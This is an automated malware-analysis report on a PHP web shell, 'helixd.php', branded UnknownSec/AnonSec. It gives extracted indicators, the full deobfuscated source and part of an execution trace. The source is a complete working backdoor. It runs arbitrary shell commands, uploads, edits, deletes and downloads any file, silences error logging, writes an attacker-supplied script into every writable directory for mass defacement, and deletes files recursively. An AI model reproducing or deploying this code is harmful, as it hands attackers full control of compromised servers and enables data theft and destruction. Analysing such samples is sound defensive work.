PHP Malware Analysis
helixd.php
md5: 1f2e1640d364fa76e9ecee3d87ad35e8
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- unknownsec1337@gmail.com (Deobfuscated, Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- " . $_SERVER['HTTP_HOST'] . " - {$▛} 403 (Deobfuscated)
- ".$_SERVER['HTTP_HOST']." - $▛ 403 (Original)
- localhost - UnknownSec 403 (HTML)
URLs
- ftp.sh/AnonSec.jpg (Deobfuscated, Original)
- ftp.sh/main/style.css (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if (isset($_GET['option']) && $_POST['opt'] == 'download') {
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="' . $_POST['name'] . '"');
echo file_get_contents($_POST['path']);
exit;
}
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function dc($dir, $p)
{
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>" . $p . "</font>";
} else {
return "<font color='red'>" . $p . "</font>";
}
}
function ip()
{
$ipas = '';
if (getenv('HTTP_CLIENT_IP')) {
$ipas = getenv('HTTP_CLIENT_IP');
} else {
if (getenv('HTTP_X_FORWARDED_FOR')) {
$ipas = getenv('HTTP_X_FORWARDED_FOR');
} else {
if (getenv('HTTP_X_FORWARDED')) {
$ipas = getenv('HTTP_X_FORWARDED');
} else {
if (getenv('HTTP_FORWARDED_FOR')) {
$ipas = getenv('HTTP_FORWARDED_FOR');
} else {
if (getenv('HTTP_FORWARDED')) {
$ipas = getenv('HTTP_FORWARDED');
} else {
if (getenv('REMOTE_ADDR')) {
$ipas = getenv('REMOTE_ADDR');
} else {
$ipas = 'IP tidak dikenali';
}
}
}
}
}
}
return $ipas;
}
function ekse()
{
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = "";
$output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && true) {
$methodArray[] = "exec";
}
//shell_exec()
$return = "";
$output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method)
{
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file)
{
$p = fileperms($file);
if (($p & 0xc000) == 0xc000) {
$i = 's';
} elseif (($p & 0xa000) == 0xa000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= $p & 0x100 ? 'r' : '-';
$i .= $p & 0x80 ? 'w' : '-';
$i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
$i .= $p & 0x20 ? 'r' : '-';
$i .= $p & 0x10 ? 'w' : '-';
$i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-');
$i .= $p & 0x4 ? 'r' : '-';
$i .= $p & 0x2 ? 'w' : '-';
$i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-');
return $i;
}
echo "\n<!DOCTYPE HTML>\n<html>\n\t<head>\n\t\t<meta name='author' content='{$▛}'>\n\t\t<meta name='robots' content='NOINDEX, NOFOLLOW'>\n\t\t<title>" . $_SERVER['HTTP_HOST'] . " - {$▛} 403</title>\n\t\t<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>\n\t\t<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n\t\t<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>\n\t</head>\n<body class='bg-secondary text-light'>\n<div class='container-fluid'>\n\t<div class='py-3' id='main'>\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\n\t\t<a class='text-decoration-none text-light' href='" . $_SERVER['PHP_SELF'] . "'><h4>{$▛} Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<i class=\"bi bi-hdd-rack\"></i> : <a class=\"text-decoration-none text-light\" href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a class=\"text-decoration-none\" href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo " [ " . ▟($path, p($path)) . " ]";
echo "\n<div class='dropdown'>\n\t<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>\n\t<div class='dropdown-menu'>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=upload'><i class='bi bi-upload'></i> Upload</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=delete'><i class='bi bi-trash'></i> Mass delete</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=info'><i class='bi bi-info-circle'></i> Info server</a>\n\t\t<a class='dropdown-item' href='?path={$path}&dir={$path}&id=about'><i class='bi bi-info'></i> About</a></h5>\n\t</div>\n</div>";
// tools nya
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$scdir = explode("/", $dir);
for ($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if ($i != $c_dir) {
} elseif ($_GET['id'] == 'depes') {
function mass_kabeh($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$▚}<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc, $namafile, $isi_script);
}
}
}
}
}
}
function mass_biasa($dir, $namafile, $isi_script)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif ($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
echo "[<font color=green>success</font>] {$dirb}/{$namafile}<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if ($_POST['start']) {
if ($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif ($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b>Tipe:</b><br>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\n</div>\n<div class='custom-control custom-switch'>\n\t<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\n</div>\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\n\t<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />\n\t<input type='submit' name='start' value='Go' class='btn btn-outline-light'>\n</form>";
}
} elseif ($_GET['id'] == 'info') {
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>{$disfunc}</font>";
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = @ini_get(strtolower("safe_mode")) == 'on' ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>" . php_uname() . "</font><br />";
echo "<b>Software: </b><font color=green>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br />";
echo "<b>PHP version: </b><font color=green>PHP_VERSION</font> <b>PHP os:</b> <font color=green>PHP_OS</font><br />";
echo "<b>Server Ip: </b><font color=green>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font><br />";
echo "<b>Your Ip: </b><font color=green>" . ip() . "</font><br />";
echo "<b>User: </b><font color=green>{$user}</font> ({$uid}) | <b>Group:</b> <font color=green>{$group}</font> ({$gid})<br />";
echo "<b>Safe Mode: </b>{$sm}<br />";
echo "<kbd>Disable Function:</kbd><pre>{$disfc}</pre>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'about') {
echo '<br />' . $▘ . '
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo "</div>\n\t</div>\n</div>";
} elseif ($_GET['id'] == 'cmd') {
echo "{$▘}<br>\n<form method='POST'>\n<div class='input-group mb-3'>\n\t<input class='form-control' type='text' name='cmd' value='{$cmd}'>\n\t<select class='bg-dark text-light form-control' name='execCMD'>\n\t\t<option>{$method}</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>{$value}</option>";
}
echo "</select>\n\t</div>\n</form>";
if ($cmd == "") {
echo "\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<pre>";
ekseCMD("whoami", $method);
echo "</pre>\n\t</div>\n</div>";
} else {
echo "\n<div class='card text-dark'>\n\t<div class='card-header'>\n\t\t<pre><kbd>~\$ " . $cmd . "</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>\n\t</div>\n</div>";
}
} elseif ($_GET['id'] == 'upload') {
echo '<br />' . $▘ . '
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
} elseif ($_GET['id'] == 'delete') {
function hapus_massal($dir, $namafile)
{
if (is_writable($dir)) {
$dira = scandir($dir);
foreach ($dira as $dirb) {
$dirc = "{$dir}/{$dirb}";
$▚ = $dirc . '/' . $namafile;
if ($dirb === '.') {
if (file_exists("{$dir}/{$namafile}")) {
unlink("{$dir}/{$namafile}");
}
} elseif ($dirb === '..') {
if (file_exists("" . dirname($dir) . "/{$namafile}")) {
unlink("" . dirname($dir) . "/{$namafile}");
}
} else {
if (is_dir($dirc)) {
if (is_writable($dirc)) {
if (file_exists($▚)) {
echo "[<font color=green>deleted</font>] {$▚}<br>";
unlink($▚);
$▟ = hapus_massal($dirc, $namafile);
}
}
}
}
}
}
}
if ($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />{$▘}\n<form method='post'>\n\t<b><i class='bi bi-folder'></i> Lokasi:</b>\n\t<input class='form-control' type='text' name='d_dir' value='{$dir}' height='10'>\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\n\t<div class='input-group mb-3'>\n\t<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>\n\t<div class='input-group-append'>\n\t<input class='btn btn-outline-light' type='submit' name='start' value='Go'>\n</form>\n\t</div>\n\t</div>";
}
}
}
// akhir tools
if (isset($_GET['filesrc'])) {
echo "<br><b>name : </b>" . basename($_GET['filesrc']);
"</br>";
echo '<textarea class="form-control" rows="7" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea><br />';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '<br><b>name : </b>' . basename($_POST['path']);
'</br>';
//Chmod
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '"/>
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="chmod">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_GET['opt'] == 'btw') {
$cwd = getcwd();
echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
<div class="input-group mb-3">
<input class="form-control" name="name" type="text" value="Folder"/>
<input class="form-control" type="hidden" name="path" value="' . $cwd . '">
<input class="form-control" type="hidden" name="opt" value="delete">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success change name",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change name",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="newname" type="text" value="' . $_POST['name'] . '" />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="rename">
<div class="input-group-append">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form>
</div>
</div>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Edit file Success",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed edit file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
fclose($fp);
}
echo '<form method="POST">
<textarea class="form-control" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input class="form-control" type="hidden" name="path" value="' . $_POST['path'] . '">
<input class="form-control" type="hidden" name="opt" value="edit">
<input class="btn btn-outline-light" type="submit" value="Go"/>
</form><br />';
}
} else {
//delete dir
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete dir",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete dir",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success delete file",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
} else {
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed delete file",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path=' . $path . '"}})</script>
';
}
}
}
echo "</center>";
$scandir = scandir($path);
$pa = getcwd();
echo "<div class=\"table-responsive\">\n<table class=\"table table-hover table-dark text-light\">\n<thead>\n<tr>\n\t<td class=\"text-center\">Name</td>\n\t\t<td class=\"text-center\">Last edit</td>\n\t\t<td class=\"text-center\">Size</td>\n\t\t<td class=\"text-center\">Permission</td>\n\t<td class=\"text-center\">Options</td>\n</tr>\n</thead>\n<tbody class=\"text-nowrap\">";
foreach ($scandir as $dir) {
$dt = date("Y-m-d", filemtime("{$path}/{$dir}"));
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "\n\t<tr>\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n\t<td><center>{$dt}</center></td>\n\t<td><center>DIR</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td>\n\t<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n<select class=\"form-select form-select-sm\" name=\"opt\">\n\t<option selected disabled>Select</option>\n\t<option value=\"delete\">Delete</option>\n\t<option value=\"chmod\">Chmod</option>\n\t<option value=\"rename\">Rename</option>\n</select>\n\t<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\n\t</form>\n</div>\n</td>\n</tr>";
}
foreach ($scandir as $file) {
$ft = date("Y-m-d", filemtime("{$path}/{$file}"));
if (!is_file($path . '/' . $file)) {
continue;
}
$s = filesize($path . '/' . $file) / 1024;
$s = round($s, 3);
if ($s >= 1024) {
$s = round($s / 1024, 2) . ' MB';
} else {
$s .= ' KB';
}
echo "\n\t<tr>\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n\t<td><center>{$ft}</center></td>\n\t<td><center>{$s}</center></td>\n\t<td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"green\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo p("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td>\n\t<td>\n<form method=\"POST\" action=\"?option&path={$path}\">\n<div class='input-group mb-3 text-center'>\n<select class=\"form-select form-select-sm\"name=\"opt\">\n\t<option selected disabled>Select</option>\n\t\t<option value=\"delete\">Delete</option>\n\t\t<option value=\"edit\">Edit</option>\n\t\t<option value=\"rename\">Rename</option>\n\t\t<option value=\"chmod\">Chmod</option>\n\t<option value=\"download\">Download</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n\t\t<input class=\"btn btn-outline-light btn-sm\" type=\"submit\" value=\"Go\"/>\n\t</form>\n</div>\n</td>\n</tr>";
}
}
echo "\n</tbody>\n</table>\n<div class='text-center'>\n\t<kbd>Copyright © " . date("Y") . " - {$▛}</kbd>\n</div>\n\t</div>\n\t\t</div>\n\t</div>\n</div>\n<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\n<script src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>\n<script src='//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>\n</body>\n</html>";Execution traces
data/traces/1f2e1640d364fa76e9ecee3d87ad35e8_trace-1676246984.4314.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:10:10.329256]
1 0 1 0.000147 393528
1 3 0 0.000776 521552 {main} 1 /var/www/html/uploads/helixd.php 0 0
2 4 0 0.000794 521552 set_time_limit 0 /var/www/html/uploads/helixd.php 7 1 0
2 4 1 0.000811 521616
2 4 R FALSE
2 5 0 0.000825 521584 error_reporting 0 /var/www/html/uploads/helixd.php 8 1 0
2 5 1 0.000838 521624
2 5 R 22527
2 6 0 0.000852 521584 ini_set 0 /var/www/html/uploads/helixd.php 9 2 'error_log' NULL
2 6 1 0.000868 521656
2 6 R ''
2 7 0 0.000881 521584 ini_set 0 /var/www/html/uploads/helixd.php 10 2 'log_errors' 0
2 7 1 0.000895 521656
2 7 R '1'
2 8 0 0.000908 521584 ini_set 0 /var/www/html/uploads/helixd.php 11 2 'max_execution_time' 0
2 8 1 0.000921 521624
2 8 R '0'
2 9 0 0.000933 521552 ini_set 0 /var/www/html/uploads/helixd.php 12 2 'output_buffering' 0
2 9 1 0.000947 521624
2 9 R FALSE
2 10 0 0.000960 521552 ini_set 0 /var/www/html/uploads/helixd.php 13 2 'display_errors' 0
2 10 1 0.000973 521624
2 10 R ''
1 A /var/www/html/uploads/helixd.php 15 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/helixd.php 16 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001013 521552 get_magic_quotes_gpc 0 /var/www/html/uploads/helixd.php 25 0
2 11 1 0.001025 521552
2 11 R FALSE
2 12 0 0.001039 521552 htmlspecialchars 0 /var/www/html/uploads/helixd.php 114 1 NULL
2 12 1 0.001053 521744
2 12 R ''
1 A /var/www/html/uploads/helixd.php 114 $cmd = ''
2 13 0 0.001077 521712 htmlspecialchars 0 /var/www/html/uploads/helixd.php 115 1 NULL
2 13 1 0.001090 521904
2 13 R ''
1 A /var/www/html/uploads/helixd.php 115 $method = ''
2 14 0 0.001115 521872 getcwd 0 /var/www/html/uploads/helixd.php 174 0
2 14 1 0.001129 521920
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/helixd.php 174 $path = '/var/www/html/uploads'
2 15 0 0.001155 521920 str_replace 0 /var/www/html/uploads/helixd.php 176 3 '\\' '/' '/var/www/html/uploads'
2 15 1 0.001170 522016
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/helixd.php 176 $path = '/var/www/html/uploads'
2 16 0 0.001194 521920 explode 0 /var/www/html/uploads/helixd.php 177 2 '/' '/var/www/html/uploads'
2 16 1 0.001209 522496
2 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/helixd.php 177 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/helixd.php 178 $id = 0
1 A /var/www/html/uploads/helixd.php 180 $a = TRUE
1 A /var/www/html/uploads/helixd.php 178 $id = 1
1 A /var/www/html/uploads/helixd.php 186 $i = 0
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 178 $id = 2
1 A /var/www/html/uploads/helixd.php 186 $i = 0
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 178 $id = 3
1 A /var/www/html/uploads/helixd.php 186 $i = 0
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 178 $id = 4
1 A /var/www/html/uploads/helixd.php 186 $i = 0
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
1 A /var/www/html/uploads/helixd.php 186 $i++
2 17 0 0.001445 522424 p 1 /var/www/html/uploads/helixd.php 192 1 '/var/www/html/uploads'
3 18 0 0.001457 522424 fileperms 0 /var/www/html/uploads/helixd.php 118 1 '/var/www/html/uploads'
3 18 1 0.001474 522488
3 18 R 16895
2 A /var/www/html/uploads/helixd.php 118 $p = 16895
2 A /var/www/html/uploads/helixd.php 128 $i = 'd'
2 A /var/www/html/uploads/helixd.php 136 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 137 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 140 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 141 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 142 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 145 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 146 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 147 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 150 $i .= 'x'
2 17 1 0.001607 522488
2 17 R 'drwxrwxrwx'
2 19 0 0.001622 522488 ▟ 1 /var/www/html/uploads/helixd.php 192 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 20 0 0.001636 522488 getcwd 0 /var/www/html/uploads/helixd.php 35 0
3 20 1 0.001648 522536
3 20 R '/var/www/html/uploads'
2 A /var/www/html/uploads/helixd.php 35 $▚ = '/var/www/html/uploads'
3 21 0 0.001673 522536 is_writable 0 /var/www/html/uploads/helixd.php 37 1 '/var/www/html/uploads'
3 21 1 0.001691 522576
3 21 R TRUE
2 19 1 0.001705 522552
2 19 R '<font color=\'green\'>drwxrwxrwx</font>'
2 22 0 0.001723 522448 getcwd 0 /var/www/html/uploads/helixd.php 210 0
2 22 1 0.001735 522496
2 22 R '/var/www/html/uploads'
1 A /var/www/html/uploads/helixd.php 210 $dir = '/var/www/html/uploads'
2 23 0 0.001760 522496 str_replace 0 /var/www/html/uploads/helixd.php 212 3 '\\' '/' '/var/www/html/uploads'
2 23 1 0.001775 522592
2 23 R '/var/www/html/uploads'
1 A /var/www/html/uploads/helixd.php 212 $dir = '/var/www/html/uploads'
2 24 0 0.001799 522496 explode 0 /var/www/html/uploads/helixd.php 213 2 '/' '/var/www/html/uploads'
